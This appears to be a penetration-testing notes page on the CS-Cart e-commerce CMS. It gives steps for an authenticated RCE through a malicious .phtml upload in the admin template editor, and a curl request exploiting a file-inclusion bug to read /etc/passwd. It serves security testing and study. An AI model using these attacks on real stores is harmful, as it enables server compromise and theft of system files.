CS-Cart

CS-Cart is a web-based content management system focused on building and managing online stores and e-commerce websites. It provides features such as product catalog management, user administration, and customizable templates to streamline storefront creation and maintenance. CS-Cart operates over standard web ports, typically TCP 80 for HTTP and 443 for HTTPS, delivering content and processing user interactions through web protocols.

Version Enumeration

Authenticated RCE

$ searchsploit cs-cart 1.3.3
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt

PoC info:

Login via <target>/admin.php and go to Look and Feel → Template editor
Upload the malicious .php file (rename it to .phtml)
Call the file via the appropriate path, e.g. , http://<target>/skins/malicious.phtml

Unauthenticated RFI

$ searchsploit cs-cart 1.3.3
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion | php/webapps/1872.txt

$ curl -s 'http://pgbox/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00'

PreviousCMS NextDNN

Last updated 10 days ago

Was this helpful?